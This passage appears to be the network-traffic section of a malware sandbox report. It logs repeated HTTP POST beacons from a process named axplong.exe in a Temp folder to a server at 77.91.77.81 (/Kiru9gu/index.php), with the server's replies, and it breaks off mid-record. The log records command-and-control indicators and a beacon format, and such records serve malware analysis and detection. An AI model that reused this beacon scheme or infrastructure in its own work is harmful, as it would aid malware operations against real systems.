                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  61192.168.2.44979877.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:12.058332920 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:12.770845890 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:12 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  62192.168.2.44979977.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:12.780452967 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:13.509793997 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:13 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  63192.168.2.44980077.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:13.626180887 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:14.389738083 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:14 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  64192.168.2.44980277.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:14.531630039 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:15.261244059 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:15 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  65192.168.2.44980377.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:16.134707928 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:16.854368925 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  66192.168.2.44980477.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:16.970205069 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:17.686127901 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  67192.168.2.44980577.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:17.696899891 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:18.398189068 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:18 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  68192.168.2.44980677.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:18.517333984 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:19.234682083 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  69192.168.2.44980777.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:19.689344883 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:20.456578970 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:20 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  70192.168.2.44980877.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:20.579199076 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:21.299407959 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:21 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  71192.168.2.44980977.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:21.311049938 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:22.018337965 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:21 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  72192.168.2.44981077.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:22.150718927 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:22.836713076 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:22 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  73192.168.2.44981177.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:22.866240025 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:23.563111067 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:23 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  74192.168.2.44981277.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:23.739320040 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:24.449767113 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:24 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  75192.168.2.44981377.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:24.659667969 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:25.225718021 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  76192.168.2.44981477.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:25.592184067 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:26.179605007 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:26 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  77192.168.2.44981577.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:26.192961931 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:26.926578999 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:26 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  78192.168.2.44981677.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:27.229995012 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:27.926383972 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:27 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  79192.168.2.44981777.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:28.724673986 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:29.373922110 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:29 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  80192.168.2.44981877.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:29.483282089 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:30.191370010 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:30 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  81192.168.2.44981977.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:30.201194048 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Jul 2, 2024 00:26:30.889023066 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:30 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  82192.168.2.44982077.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:31.001980066 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 2, 2024 00:26:31.711632013 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Mon, 01 Jul 2024 22:26:31 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  83192.168.2.44982177.91.77.81807548C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 00:26:32.704966068 CEST304OUTPOST /Kiru9gu/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 77.91.77.81
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
